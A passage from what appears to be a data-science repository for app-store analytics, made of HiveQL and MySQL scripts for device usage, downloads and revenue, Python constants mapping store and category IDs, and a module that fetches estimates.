session.bundleid
;
drop table if exists monthly_device_usage ;
create table monthly_device_usage(
end_date string,
device_id string,
device_type string,
bundleid string,
total_bandwidth float,
duration float,
n_sessions int
)
row format delimited fields terminated by '\t'
lines terminated by '\n'
stored as textfile
location 's3://aardvark-prod-pdx-ds-workspace/whales/sample_monthly_device_usage'
;
insert overwrite table monthly_device_usage
select
max(session.datestr) as end_date,
session.device_id,
max(d.type) as device_type,
session.bundleid,
max(d.total_bandwidth) as total_bandwidth,
sum(session.session_duration) as duration,
sum(session.n_sessions) as n_sessions
from
period_active_monthly monthly
join active_devices_monthly active
on monthly.device_id = active.device_id
and monthly.end_period_date = active.end_period_date
join period_users d
on monthly.device_id = d.device_id
join daily_sessions_per_user session
on active.date = session.datestr
and active.device_id = session.device_id
group by
session.device_id,
session.bundleid
;
drop table if exists weekly_device_usage ;
create table weekly_device_usage(
end_date string,
device_id string,
device_type string,
bundleid string,
total_bandwidth float,
duration float,
n_sessions int
)
row format delimited fields terminated by '\t'
lines terminated by '\n'
stored as textfile
location 's3://aardvark-prod-pdx-ds-workspace/whales/sample_weekly_device_usage'
;
insert overwrite table weekly_device_usage
select
max(session.datestr) as end_date,
session.device_id,
max(d.type) as device_type,
session.bundleid,
max(d.total_bandwidth) as total_bandwidth,
sum(session.session_duration) as duration,
sum(session.n_sessions) as n_sessions
from
period_active_weekly weekly
join active_devices_weekly active
on weekly.device_id = active.device_id
and weekly.end_period_date = active.end_period_date
and active.end_period_date = ${hiveconf:week_end_date}
join period_users_week d
on weekly.device_id = d.device_id
join daily_sessions_per_user session
on active.date = session.datestr
and active.device_id = session.device_id
group by
session.device_id,
session.bundleid
;
<file_sep>/int-vs-m-benchmark/sql/android/1001c1-prepare_transactional_data-collect_data.sql
/*
DESCRIPTION : collect daily transactional data for selected dates
INPUT TABLE(S) : market.downloads
market.applications
temp.settings_day_weights
temp.settings_excluded_apps
temp.settings_exchange_rates
INTERIM TABLE(S) : temp.settings_unique_appstore_instances
temp.device_installs
temp.revenue
OUTPUT TABLE(S) : temp.one_off_and_iap
QUERY STEPS : 1. create table with unique appstore instances
2. collect all transactional data, both one-off and iap for selected dates by country
*/
-- Select unique appstore instances --
DROP TEMPORARY TABLE IF EXISTS temp.settings_unique_appstore_instances;
CREATE TEMPORARY TABLE temp.settings_unique_appstore_instances(
appstore_instance_id smallint(5) unsigned NOT NULL,
country_id int(10) unsigned NOT NULL,
CONSTRAINT PRIMARY KEY (
appstore_instance_id,
country_id)
)
AS
SELECT
DISTINCT appstore_instance_id,
country_id
FROM
temp.settings_appstore_instances
;
/* Collect transactional data
This is done in two steps: run time can occasionally be very long (> 1
hour) if it's done in one step.
Device installs are identified by the type 'download_device' in the report
and revenue by type 'download'.
The values for these types are given by delta's (i.e. transactions) that
should be multiplied by country & app-specific prices and currencies (in
contrast to the Apple App store, a publisher can specify for
each country in which currency he wants to get paid).
There is no distinction yet between the type of device installs
(free/paid). Since Google does not allow apps to switch between free and
paid, the distinction is made when joining the rankings table.
*/
DROP TEMPORARY TABLE IF EXISTS temp.device_installs;
CREATE TEMPORARY TABLE temp.device_installs(
date DATE NOT NULL,
country_id smallint(5) unsigned NOT NULL,
application_id int(10) unsigned NOT NULL,
revenue decimal(8,2) DEFAULT NULL,
device_installs mediumint signed DEFAULT NULL,
CONSTRAINT PRIMARY KEY (
date,
country_id,
application_id)
)
AS
SELECT
d.date,
suai.country_id,
d.application_id,
NULL AS revenue,
d.delta AS device_installs
FROM
market.downloads d
JOIN temp.settings_day_weights w
ON w.date = d.date
JOIN temp.settings_unique_appstore_instances suai
ON d.appstore_instance_id = suai.appstore_instance_id
LEFT JOIN temp.settings_excluded_apps sea
ON d.application_id = sea.application_id
WHERE
d.delta > 0
AND sea.application_id IS NULL
AND d.type = 'download_device'
GROUP BY
d.date,
suai.country_id,
d.application_id;
DROP TEMPORARY TABLE IF EXISTS temp.revenue;
CREATE TEMPORARY TABLE temp.revenue(
date DATE NOT NULL,
country_id smallint(5) unsigned NOT NULL,
application_id int(10) unsigned NOT NULL,
revenue decimal(8,2) DEFAULT NULL,
device_installs mediumint signed DEFAULT NULL,
missing_currency_id smallint(6) unsigned DEFAULT NULL,
CONSTRAINT PRIMARY KEY (
date,
country_id,
application_id)
)
AS
SELECT
date,
country_id,
IFNULL(parent_id, application_id) AS application_id,
-- Sum to attribute in-apps statistics to the parent app.
SUM(revenue) AS revenue,
NULL AS device_installs,
MIN(missing_currency_id) AS missing_currency_id
FROM (
SELECT
d.date,
suai.country_id,
d.application_id,
-- TODO what if d.delta * d.customer_price / ser.rate is crazy -> null | 0?
ROUND(SUM(d.delta * d.customer_price / ser.rate), 2) AS revenue,
MIN(IF(ser.id IS NULL, d.customer_currency_id, NULL)) AS missing_currency_id
FROM
market.downloads d FORCE KEY (PRIMARY)
JOIN temp.settings_day_weights w
ON w.date = d.date
JOIN temp.settings_unique_appstore_instances suai
ON d.appstore_instance_id = suai.appstore_instance_id
LEFT JOIN temp.settings_exchange_rates ser
ON d.customer_currency_id = ser.id
WHERE
d.delta > 0
AND d.application_id NOT IN (SELECT * FROM temp.settings_excluded_apps)
AND d.type = 'download'
AND d.customer_price > 0
GROUP BY
d.date,
suai.appstore_instance_id,
d.application_id ) x
JOIN market.applications a
ON x.application_id = a.id
GROUP BY
x.date,
x.country_id,
IFNULL(a.parent_id, x.application_id)
;
-- combine device installs and revenue in one table --
DROP TEMPORARY TABLE IF EXISTS temp.one_off_and_iap;
CREATE TEMPORARY TABLE temp.one_off_and_iap(
date DATE NOT NULL,
country_id smallint(5) unsigned NOT NULL,
application_id int(10) unsigned NOT NULL,
revenue decimal(8,2) DEFAULT NULL,
device_installs mediumint signed DEFAULT NULL,
CONSTRAINT PRIMARY KEY (
date,
country_id,
application_id)
)
SELECT
x.date,
x.country_id,
x.application_id,
SUM(x.revenue) AS revenue,
SUM(x.device_installs) AS device_installs
FROM
(SELECT
date,
country_id,
application_id,
revenue,
device_installs
FROM
temp.device_installs d
UNION
SELECT
date,
country_id,
application_id,
revenue,
device_installs
FROM
temp.revenue r) x
GROUP BY
x.date,
x.country_id,
x.application_id;
<file_sep>/financial-product-benchmark/single-model/constants.py
STORES_DICT_IOS = {
143441: u'United States',
143442: u'France',
143443: u'Germany',
143444: u'United Kingdom',
143445: u'Austria',
143446: u'Belgium',
143447: u'Finland',
143448: u'Greece',
143449: u'Ireland',
143450: u'Italy',
143451: u'Luxembourg',
143452: u'Netherlands',
143453: u'Portugal',
143454: u'Spain',
143455: u'Canada',
143456: u'Sweden',
143457: u'Norway',
143458: u'Denmark',
143459: u'Switzerland',
143460: u'Australia',
143461: u'New Zealand',
143462: u'Japan',
143463: u'Hong Kong',
143464: u'Singapore',
143465: u'China',
143466: u'South Korea',
143467: u'India',
143468: u'Mexico',
143469: u'Russia',
143470: u'Taiwan',
143471: u'Vietnam',
143472: u'South Africa',
143473: u'Malaysia',
143474: u'Philippines',
143475: u'Thailand',
143476: u'Indonesia',
143477: u'Pakistan',
143478: u'Poland',
143479: u'Saudi Arabia',
143480: u'Turkey',
143481: u'United Arab Emirates',
143482: u'Hungary',
143483: u'Chile',
143485: u'Panama',
143486: u'Sri Lanka',
143487: u'Romania',
143489: u'Czech Republic',
143491: u'Israel',
143493: u'Kuwait',
143494: u'Croatia',
143495: u'Costa Rica',
143496: u'Slovakia',
143497: u'Lebanon',
143498: u'Qatar',
143499: u'Slovenia',
143501: u'Colombia',
143502: u'Venezuela',
143503: u'Brazil',
143504: u'Guatemala',
143505: u'Argentina',
143506: u'El Salvador',
143507: u'Peru',
143508: u'Dominican Republic',
143509: u'Ecuador',
143510: u'Honduras',
143511: u'Jamaica',
143512: u'Nicaragua',
143513: u'Paraguay',
143514: u'Uruguay',
143515: u'Macau',
143516: u'Egypt',
143517: u'Kazakhstan',
143518: u'Estonia',
143519: u'Latvia',
143520: u'Lithuania',
143521: u'Malta',
143523: u'Moldova',
143524: u'Armenia',
143525: u'Botswana',
143526: u'Bulgaria',
143528: u'Jordan',
143529: u'Kenya',
143530: u'Macedonia',
143531: u'Madagascar',
143532: u'Mali',
143533: u'Mauritius',
143534: u'Niger',
143535: u'Senegal',
143536: u'Tunisia',
143537: u'Uganda',
143538: u'Anguilla',
143539: u'Bahamas',
143540: u'Antigua and Barbuda',
143541: u'Barbados',
143542: u'Bermuda',
143543: u'British Virgin Islands',
143544: u'Cayman Islands',
143545: u'Dominica',
143546: u'Grenada',
143547: u'Montserrat',
143548: u'St. Kitts and Nevis',
143549: u'St. Lucia',
143550: u'St. Vincent and The Grenadines',
143551: u'Trinidad and Tobago',
143552: u'Turks and Caicos',
143553: u'Guyana',
143554: u'Suriname',
143555: u'Belize',
143556: u'Bolivia',
143557: u'Cyprus',
143558: u'Iceland',
143559: u'Bahrain',
143560: u'Brunei',
143561: u'Nigeria',
143562: u'Oman',
143563: u'Algeria',
143564: u'Angola',
143565: u'Belarus',
143566: u'Uzbekistan',
143568: u'Azerbaijan',
143571: u'Yemen',
143572: u'Tanzania',
143573: u'Ghana',
143575: u'Albania',
143576: u'Benin',
143577: u'Bhutan',
143578: u'Burkina Faso',
143579: u'Cambodia',
143580: u'Cape Verde',
143581: u'Chad',
143582: u'Congo',
143583: u'Fiji',
143584: u'Gambia',
143585: u'Guinea-Bissau',
143586: u'Kyrgyzstan',
143587: u'Laos',
143588: u'Liberia',
143589: u'Malawi',
143590: u'Mauritania',
143591: u'Micronesia',
143592: u'Mongolia',
143593: u'Mozambique',
143594: u'Namibia',
143484: u'Nepal',
143595: u'Palau',
143597: u'Papua New Guinea',
143598: u'Sao Tome and Principe',
143599: u'Seychelles',
143600: u'Sierra Leone',
143601: u'Solomon Islands',
143602: u'Swaziland',
143603: u'Tajikistan',
143604: u'Turkmenistan',
143492: u'Ukraine',
143605: u'Zimbabwe'}
CATEGORIES_DICT_IOS = {
36: u'Overall',
100: u'Applications',
6000: u'Business',
6001: u'Weather',
6002: u'Utilities',
6003: u'Travel',
6004: u'Sports',
6005: u'Social Networking',
6006: u'Reference',
6007: u'Productivity',
6008: u'Photo and Video',
6009: u'News',
6010: u'Navigation',
6011: u'Music',
6012: u'Lifestyle',
6013: u'Health and Fitness',
6014: u'Games',
6015: u'Finance',
6016: u'Entertainment',
6017: u'Education',
6018: u'Books',
6020: u'Medical',
6021: u'Newsstand',
6022: u'Catalogs',
6023: u'Food and Drink',
7001: u'Games Action',
7002: u'Games Adventure',
7003: u'Games Arcade',
7004: u'Games Board',
7005: u'Games Card',
7006: u'Games Casino',
7007: u'Games Dice',
7008: u'Games Education',
7009: u'Games Family',
7010: u'Games Kids',
7011: u'Games Music',
7012: u'Games Puzzle',
7013: u'Games Racing',
7014: u'Games Role Playing',
7015: u'Games Simulation',
7016: u'Games Sports',
7017: u'Games Strategy',
7018: u'Games Trivia',
7019: u'Games Word',
360: u'Kids',
361: u'Kids 5 & Under',
362: u'Kids Ages 6-8',
363: u'Kids Ages 9-11',
}
FEEDS_DICT_IOS ={
0: 'iphone_free',
1:'iphone_paid',
2:'iphone_revenue',
100:'ipad_paid',
101:'ipad_free',
102:'ipad_revenue'}
STORES_DICT_ANDROID = {
1: u'Australia',
2: u'Canada',
3: u'China',
4: u'Germany',
5: u'Spain',
6: u'France',
7: u'United Kingdom',
8: u'Italy',
9: u'Japan',
10: u'United States',
11: u'Belgium',
12: u'Switzerland',
13: u'Chile',
14: u'South Africa',
15: u'Vietnam',
16: u'Hong Kong',
17: u'Argentina',
18: u'Brazil',
19: u'India',
20: u'Finland',
21: u'Indonesia',
22: u'Russia',
23: u'Netherlands',
24: u'Malaysia',
25: u'Turkey',
26: u'Mexico',
27: u'South Korea',
28: u'Poland',
29: u'Thailand',
30: u'Taiwan',
31: u'Philippines',
32: u'Singapore',
33: u'Egypt',
34: u'Sweden',
35: u'Austria',
36: u'Czech Republic',
37: u'Hungary',
38: u'Denmark',
39: u'Ireland',
40: u'Israel',
41: u'New Zealand',
42: u'Norway',
43: u'Portugal',
44: u'Romania',
45: u'Slovakia',
46: u'Greece',
47: u'Bulgaria',
48: u'Ukraine',
49: u'United Arab Emirates',
50: u'Kuwait'}
FEEDS_DICT_ANDROID ={
0: 'free',
1: 'paid',
2: 'grossing'}
CATEGORIES_DICT_ANDROID = {
1: u'Overall',
2: u'Games',
3: u'Games Arcade & Action',
4: u'Games Brain & Puzzle',
5: u'Games Cards & Casino',
6: u'Games Casual',
7: u'Games Live Wallpaper',
8: u'Games Racing',
9: u'Games Sports',
10: u'Games Widgets',
11: u'Applications',
12: u'Books & Reference',
13: u'Business',
14: u'Comics',
15: u'Communication',
16: u'Education',
17: u'Entertainment',
18: u'Finance',
19: u'Health & Fitness',
20: u'Libraries & Demo',
21: u'Lifestyle',
22: u'Apps Live Wallpaper',
23: u'Media & Video',
24: u'Medical',
25: u'Music & Audio',
26: u'News & Magazines',
27: u'Personalization',
28: u'Photography',
29: u'Productivity',
30: u'Shopping',
31: u'Social',
32: u'Sports',
33: u'Tools',
34: u'Transportation',
35: u'Travel & Local',
36: u'Weather',
37: u'App Widgets',
38: u'Games Action',
39: u'Games Adventure',
40: u'Games Word',
41: u'Games Arcade',
42: u'Games Board',
43: u'Games Card',
44: u'Games Casino',
46: u'Games Educational',
47: u'Games Family',
48: u'Games Music',
49: u'Games Puzzle',
51: u'Games Role Playing',
52: u'Games Simulation',
54: u'Games Strategy',
55: u'Games Trivia',
}
<file_sep>/old_investigations/merge_original_and_weighted.py
'''
Created on Dec 24, 2012
@author: perezrafael
'''
import os
import pandas as pd
if __name__ == '__main__':
original_path = './data_original'
weighted_path = './data_weighted'
merged_path = './data_merged'
if not os.path.exists(merged_path):
os.makedirs(merged_path)
for filename in os.listdir(original_path):
f_original = os.path.join(original_path, filename)
f_weighted = os.path.join(weighted_path, filename)
f_merged = os.path.join(merged_path, filename)
df_original = pd.read_csv(f_original)
df_weighted = pd.read_csv(f_weighted)
df_original = df_original[['category_id', 'rank', 'app_id', 'estimate', 'date', 'feed_id', 'store_id', 'units']]
df_weighted = df_weighted[['category_id', 'rank', 'app_id', 'estimate', 'date', 'feed_id', 'store_id', 'units']]
df_merged = pd.merge(df_original, df_weighted, on=['category_id', 'rank', 'app_id', 'date', 'feed_id', 'store_id', 'units'])
df_merged = df_merged.rename(columns={'estimate_x': 'original_estimate', 'estimate_y': 'weighted_estimate'})
df_merged = df_merged.sort(columns = ['store_id', 'category_id', 'feed_id', 'date', 'rank'])
df_merged.to_csv(f_merged)<file_sep>/audience/loaded_dice/lib/constants.py
STORE_ID = 143441
BIN_LABELS = ['14-18','18-25','25-35','35-45','45-55','55+']
ERROR_CUTOFF = {'0.10':140,'0.075':270,'0.05':600}
BINNED_AGES_REVIEW_QUERY = """
SELECT
res.app_id,
res.reviewer,
res.age,
res.bin
FROM (
SELECT
rev1.app_id,
EXTRACT(YEAR FROM rev1.date) as year,
EXTRACT(MONTH FROM rev1.date) as month,
rev1.reviewer,
rev1.birthyear,
rev1.age,
MAX(rev1.age) OVER (PARTITION BY rev1.app_id,rev1.reviewer) as max_age,
CASE
WHEN 14<=rev1.age AND rev1.age<18 THEN '14-18'
WHEN 18<=rev1.age AND rev1.age<25 THEN '18-25'
WHEN 25<=rev1.age AND rev1.age<35 THEN '25-35'
WHEN 35<=rev1.age AND rev1.age<45 THEN '35-45'
WHEN 45<=rev1.age AND rev1.age<55 THEN '45-55'
WHEN 55<=rev1.age THEN '55+'
END as bin
FROM (
SELECT
rev.app_id,
rev.date,
rev.reviewer,
rev.year_token as birthyear,
date_part('year', rev.date)::int-year_token as age
FROM (
SELECT
app_id,
date,
reviewer,
UNNEST(regexp_matches(reviewer, '[^\d](\d{{4}})[^\d]|^(\d{{4}})|(\d{{4}})$','g')::integer[]) as year_token
FROM
aa_review
WHERE
store_id = {store_id}
and app_id IN ({app_ids})
and date between date('{begin_date}') and date('{end_date}')
) rev
WHERE
year_token IS NOT NULL AND
to_date(to_char(rev.year_token,'9999'),'YYYY') <@ daterange('1930-01-01','2000-01-01')
) rev1
) res
WHERE
res.age=res.max_age
GROUP BY
app_id, reviewer, age, bin
"""
TOTAL_REVIEWS_QUERY = """
SELECT
app_id,
count(DISTINCT reviewer) as review_count
FROM
aa_review
WHERE
store_id = {store_id}
and app_id IN ({app_ids})
and date between date('{begin_date}') and date('{end_date}')
GROUP BY
app_id
"""
AUDIENCE_BINNED_AGES_QUERY = """
SELECT
app_id,
ages
FROM
est_demographics
WHERE
granularity = 12
and store_id = {store_id}
and app_id IN ({app_ids})
and year = {year}
and month = {month}
"""
<file_sep>/int-vs-m-benchmark/sql/android/1001c2-prepare_transactional_data-weighted_averaging.sql
/*
DESCRIPTION : average downloads and revenue over the selected dates
INPUT TABLE(S) : temp.one_off_and_iap
market.applications
temp.settings_day_weights
INTERIM TABLE(S) : n/a
OUTPUT TABLE(S) :
QUERY STEPS : 1. select dates to use for estimation
2. collect all transactional data for the selected time frame
3. check if all applications have complete data for the selected time frame
4. filter applications with incomplete data
*/
-- TOTAL NUMBER OF DAYS FOR WHICH TRANSACTIONAL DATA IS COLLECTED --
SELECT COUNT(DISTINCT date) FROM temp.settings_day_weights WHERE weight > 0 INTO @transactional_days;
/*
For transactional data, applications are selected if they meet the following conditions:
- the created date is no later than @date (helpful when run historically
because created date can be in the future if new developer account
connected and app not ranked previously)
- the weighted average is non-zero and not null
*/
-- CREATING TRANSACTIONAL DATA --
DROP TEMPORARY TABLE IF EXISTS temp.transactional_data;
CREATE TEMPORARY TABLE temp.transactional_data(
date date NOT NULL,
country_id smallint(5) unsigned NOT NULL,
type ENUM('gross','paid','free'),
application_id int(10) unsigned NOT NULL,
value decimal(8,2) NOT NULL,
n_days_with_historical_data smallint(5) unsigned,
CONSTRAINT PRIMARY KEY (
date,
application_id,
country_id,
type)
)
AS
SELECT
date,
country_id,
t.type,
application_id,
CASE
WHEN t.type = 'gross' THEN revenue
-- Duplicate entries for device_installs, distinction between free and
-- paid downloads is made in joining the rankings table.
WHEN t.type in ('free', 'paid') THEN device_installs
END AS value,
n_days_with_historical_data
FROM (
SELECT
d.date,
d.country_id,
d.application_id,
DATEDIFF(@date, a.created) as n_days_with_historical_data,
ROUND(SUM(w.weight * d.revenue), 2) AS revenue,
ROUND(SUM(w.weight * d.device_installs), 2) AS device_installs
FROM
temp.one_off_and_iap d
JOIN temp.settings_day_weights w
ON d.date = w.date
JOIN market.applications a
ON d.application_id = a.id
GROUP BY
d.date,
d.country_id,
d.application_id
HAVING n_days_with_historical_data >= 0 -- it can be negative if created date is developer account connected date and not ranked date
) x
-- JOIN types in order to have one row per app per type
JOIN (
SELECT 'free' AS type
UNION
SELECT 'paid' AS type
UNION
SELECT 'gross' AS type) t
HAVING
value is NOT NULL
AND value <> 0;
<file_sep>/aa_au_model/hiveql_scripts/get_connected_devices_per_day.sql
-- get per day a list of devices that were connected on that day
-- time zone is in UTC
-- change date range and folder to output data to on ds environment
DROP TABLE IF EXISTS connected_devices_day;
CREATE TABLE connected_devices_day
AS
SELECT device_id, datestr
FROM vpn_sample_data_connection_session
WHERE datestr >= '2015-01-10'
AND datestr <= '2015-01-31'
GROUP BY device_id, datestr
;
DROP TABLE csvexport;
CREATE TABLE csvexport (
device_id STRING,
local_date STRING)
row format delimited fields terminated by '\t'
lines terminated by '\n'
STORED AS TEXTFILE
LOCATION 's3://aardvark-prod-pdx-ds-workspace/outputfolder';
;
INSERT OVERWRITE TABLE csvexport
SELECT * FROM connected_devices_day
<file_sep>/old_investigations/android/internal/stores_dict.py
"""
Translate the number to names.
"""
category_dict = {1: u'OVERALL',
2: u'GAME',
3: u'ARCADE',
4: u'BRAIN',
5: u'CARDS',
6: u'CASUAL',
7: u'GAME_WALLPAPER',
8: u'RACING',
9: u'SPORTS_GAMES',
10: u'GAME_WIDGETS',
11: u'APPLICATION',
12: u'BOOKS_AND_REFERENCE',
13: u'BUSINESS',
14: u'COMICS',
15: u'COMMUNICATION',
16: u'EDUCATION',
17: u'ENTERTAINMENT',
18: u'FINANCE',
19: u'HEALTH_AND_FITNESS',
20: u'LIBRARIES_AND_DEMO',
21: u'LIFESTYLE',
22: u'APP_WALLPAPER',
23: u'MEDIA_AND_VIDEO',
24: u'MEDICAL',
25: u'MUSIC_AND_AUDIO',
26: u'NEWS_AND_MAGAZINES',
27: u'PERSONALIZATION',
28: u'PHOTOGRAPHY',
29: u'PRODUCTIVITY',
30: u'SHOPPING',
31: u'SOCIAL',
32: u'SPORTS',
33: u'TOOLS',
34: u'TRANSPORTATION',
35: u'TRAVEL_AND_LOCAL',
36: u'WEATHER',
37: u'APP_WIDGETS'}
type_dict = {0: "FREE", 1: "PAID", 2: "GROSSING"}
units_type_dict = {0: "Downloads", 1: "Downloads", 2: "USD"}
country_dict = {
1: u'Australia',
2: u'Canada',
3: u'China',
4: u'Germany',
5: u'Spain',
6: u'France',
7: u'United Kingdom',
8: u'Italy',
9: u'Japan',
10: u'United States',
11: u'Belgium',
12: u'Switzerland',
13: u'Chile',
14: u'South Africa',
15: u'Vietnam',
16: u'Hong Kong',
17: u'Argentina',
18: u'Brazil',
19: u'India',
20: u'Finland',
21: u'Indonesia',
22: u'Russia',
23: u'Netherlands',
24: u'Malaysia',
25: u'Turkey',
26: u'Mexico',
27: u'South Korea',
28: u'Poland',
29: u'Thailand',
30: u'Taiwan',
31: u'Philippines',
32: u'Singapore',
33: u'Egypt',
34: u'Sweden',
35: u'Austria'
}
def query_stores_dict(x, t):
return eval("query_%s(x)" % t)
def query_category(x):
return category_dict[int(x)]
def query_market(x):
return "ANDROID"
def query_type(x):
return type_dict[int(x)]
def query_units_type(x):
return units_type_dict[int(x)]
def query_country(x):
return country_dict[int(x)]
def query_date(x):
return x
<file_sep>/evaluation/py/internal/est_fetcher.py
"""
Fetcher for estimation.
"""
# Author: <NAME> <<EMAIL>>
import sys
import subprocess
import itertools
from joblib import Parallel, delayed
import pandas as pd
import os.path
import commands
import datetime
import zipfile
import utilities_date
import utilities_pandas
import stores_dict
columns_dict = {'App ID':'app_id',
'App Estimate':'estimate'}
def _run_fetch_script(script_path, store, feed, dt, dtstart, type):
cmd = "python %s -s %s -f %s -d %s -t %s" % (script_path, store, feed, dt, type)
print(cmd)
try:
print("Running the cmd: %s" % cmd)
child = subprocess.Popen(cmd.split(" "), stdout=subprocess.PIPE)
stdout_value, stderr_value = child.communicate()
ret = child.returncode
if ret is None or ret >= 2 or (stderr_value is not None and 'Error' in stderr_value):
raise Exception("Have problem fetching daily estimation: %s" % cmd)
df = utilities_pandas.convert_str_to_df(stdout_value)
return utilities_pandas.add_date_column(df, dt)
except Exception as e:
print(e)
sys.exit(2)
def _replace_column(df, column):
replacement = pd.Series(stores_dict.ios['%s_dict'%column.lower()]).reset_index()
df = df.merge(replacement, left_on=column, right_on=0)
df = df.drop([column, 0], axis=1)
df.rename(columns={'index':column}, inplace=True)
return df
def _load_country_report(store, dt, type, device, customer):
reports_dir = '/delivery/customer_reports/%s'%customer
country_name = stores_dict.ios['country_dict'][int(store)].replace(' ', '_')
device = ('iOS' if device=='ios' else 'Android')
type = ('Monthly' if type=='monthly' else 'Weekly')
year, month, day = dt.split('-')
date = datetime.date(int(year), int(month), int(day))
if type=='Monthly':
file_path = '%s/%s/%s/%s_%s_%s-%02d.zip'%(reports_dir, device, type, customer, device.lower(), year, month)
elif type=='Weekly':
week_number = int(date.strftime('%U')) + 1
file_path = '%s/%s/%s/%s-Week-%02d/Top_Apps.zip'%(reports_dir, device, type, year, week_number)
z = zipfile.ZipFile(file_path, 'r')
for filename in z.namelist():
if country_name in filename:
df = pd.read_csv(z.open(filename, 'r'))
df = df[['Market', 'Type', 'App ID', 'App Estimate']]
df = df.drop_duplicates()
market_type = pd.DataFrame(stores_dict.ios['market_type'])
df = df.merge(market_type, on=['Market', 'Type'])
df = df.drop(['Market', 'Type'], axis=1)
df.rename(columns=columns_dict, inplace=True)
return df
class ScriptEstFetcher(object):
"""Base class for all script based est fetcher.
"""
@classmethod
def fetch_to_dir(cls, save_dir, stores, units_types, daterange, type):
"""
Arguments:
- `save_dir`: the dir to save the results.
- `stores`: A list of stores to fetch.
- `units_types`: A list of unit_types to fetch.
- `daterange`: A 2-element list containing the start and the end date (inclusive).
- `type`: Type of estimation, monthly, weekly, daily
"""
dtstart, dtend = daterange
feeds = itertools.chain(*[cls.unit_to_feeds[u] for u in units_types])
dts_daily = utilities_date.make_daily_daterange(dtstart, dtend)
use_report = False
for (store, feed) in itertools.product(stores, feeds):
#for store in stores:
if use_report:
if type=='monthly':
report = _load_country_report(store, dts_daily[0], type, 'ios', 'Konami')
elif type == 'weekly':
df = None
dfs = []
df = _load_country_report(store, dts_daily[0], type, 'ios', 'Konami')
for dt in dts_daily:
year, month, day = dt.split('-')
date = datetime.date(int(year), int(month), int(day))
if date.weekday() == 6:
df = _load_country_report(store, dt, type, 'ios', 'Konami')
dfs.append(utilities_pandas.add_date_column(df.copy(), dt))
report = pd.concat(dfs)
#for feed in feeds:
if True:
dfs = Parallel(n_jobs=8)(delayed(_run_fetch_script)(cls.script_path, store, feed, dt, dtstart, type)
for dt in dts_daily)
df = pd.concat(dfs)
csv_filename = os.path.join(save_dir, "%s_%s_%s--%s.csv" % (store, feed,
dts_daily[0],
dts_daily[-1]))
df = ScriptEstFetcher._add_meta_info(df, feed)
if use_report:
if type =='monthly':
df = df.merge(report, on=['app_id', 'feed_id'], how='left')
df['estimate'] = (df['estimate_y'] if df['estimate_y'] is not None else df['estimate_x'])
df = df.drop(['estimate_x', 'estimate_y'], axis=1)
elif type=='weekly':
df = df.merge(report, on=['app_id', 'feed_id', 'date'], how='left')
df['estimate'] = (df['estimate_y'] if df['estimate_y'] is not None else df['estimate_x'])
df = df.drop(['estimate_x', 'estimate_y'], axis=1)
df.to_csv(csv_filename, index=False)
@staticmethod
def _add_meta_info(df, feed):
df['feed_id'] = feed
return df
def _fetch_est_from_db(sql, store, feed, dt):
sql = sql % (store, feed, dt)
cmd = 'echo "%s"' % sql
status, stdout = commands.getstatusoutput(cmd)
if status is None or status >= 2:
raise Exception("Have problem fetching estimation from production DB.")
return utilities_pandas.convert_str_to_df(stdout)
class WebUIDBEstFetcher(object):
"""Getting data from production DB.
"""
@classmethod
def fetch_to_dir(cls, save_dir, stores, units_types, daterange):
dtstart, dtend = daterange
feeds = itertools.chain(*[cls.unit_to_feeds[u] for u in units_types])
dts_daily = utilities_date.make_daily_daterange(dtstart, dtend)
for (store, feed) in itertools.product(stores, feeds):
dfs = Parallel(n_jobs=8)(delayed(_fetch_est_from_db)(cls.sql, store, feed, dt, dtstart)
for dt in dts_daily)
df = pd.concat(dfs)
csv_filename = os.path.join(save_dir, "%s_%s_%s--%s.csv" % (store, feed,
dts_daily[0],
dts_daily[-1]))
df = ScriptEstFetcher._add_meta_info(df, feed)
df.to_csv(csv_filename, index=False)
class IosWebUIEstFetcher(WebUIDBEstFetcher):
sql = "set search_path=ios;\n" \
"COPY (SELECT store_id, feed_id, app_id, category_id, estimate " \
"FROM store_app_daily_list l, " \
"store_app_daily_estimate e" \
"WHERE l.id = e.list_id and date = '%s' and store_id=%s and feed_id=%s) TO STDOUT with CSV HEADER"
class AndroidWebUIEstFetcher(WebUIDBEstFetcher):
sql = "set search_path=android;\n" \
"COPY (SELECT store_id, feed_id, class as app_id, category_id, estimate " \
"FROM store_app_daily_list l, " \
"store_app_daily_estimate e, app_id_map m " \
"WHERE l.id = e.list_id and date = '%s' and app_id = m.id and store_id=%s and feed_id=%s) TO STDOUT with CSV HEADER"
class IosEstFetcher(ScriptEstFetcher):
"""Sorry for the sad name "Ios", but it's better to normalize things.
"""
unit_to_feeds = stores_dict.ios['unit_to_feeds']
script_path = 'external/est_ios.py'
class AndroidEstFetcher(ScriptEstFetcher):
unit_to_feeds = stores_dict.android['unit_to_feeds']
script_path = 'external/est_android.py'
@classmethod
def fetch_to_dir(cls, save_dir, stores, units_types, daterange, type):
"""
Add a special rule for dealing with China's data.
Because in China's we only have feed 0
"""
dtstart, dtend = daterange
feeds = itertools.chain(*[cls.unit_to_feeds[u] for u in units_types])
dts_daily = utilities_date.make_daily_daterange(dtstart, dtend)
for (store, feed) in itertools.product(stores, feeds):
if store == '3' and feed != 0:
continue
dfs = Parallel(n_jobs=8)(delayed(_run_fetch_script)(cls.script_path, store, feed, dt, dtstart, type)
for dt in dts_daily)
df = pd.concat(dfs)
csv_filename = os.path.join(save_dir, "%s_%s_%s--%s.csv" % (store, feed,
dts_daily[0],
dts_daily[-1]))
df = ScriptEstFetcher._add_meta_info(df, feed)
df.to_csv(csv_filename, index=False)
<file_sep>/financial-product-benchmark/automated-QA/constants.py
STORES_DICT_IOS = {
143441: u'US',
143444: u'GB',
143446: u'BE',
143452: u'NL',
143462: u'JP',
143463: u'HK',
143465: u'CN'}
CATEGORIES_DICT_IOS = {
36: u'Overall',
100: u'Applications',
6000: u'Business',
6001: u'Weather',
6002: u'Utilities',
6003: u'Travel',
6004: u'Sports',
6005: u'Social Networking',
6006: u'Reference',
6007: u'Productivity',
6008: u'Photo and Video',
6009: u'News',
6010: u'Navigation',
6011: u'Music',
6012: u'Lifestyle',
6013: u'Health and Fitness',
6014: u'Games',
6015: u'Finance',
6016: u'Entertainment',
6017: u'Education',
6018: u'Books',
6020: u'Medical',
6021: u'Newsstand',
6022: u'Catalogs',
6023: u'Food and Drink',
7001: u'Games Action',
7002: u'Games Adventure',
7003: u'Games Arcade',
7004: u'Games Board',
7005: u'Games Card',
7006: u'Games Casino',
7007: u'Games Dice',
7008: u'Games Education',
7009: u'Games Family',
7010: u'Games Kids',
7011: u'Games Music',
7012: u'Games Puzzle',
7013: u'Games Racing',
7014: u'Games Role Playing',
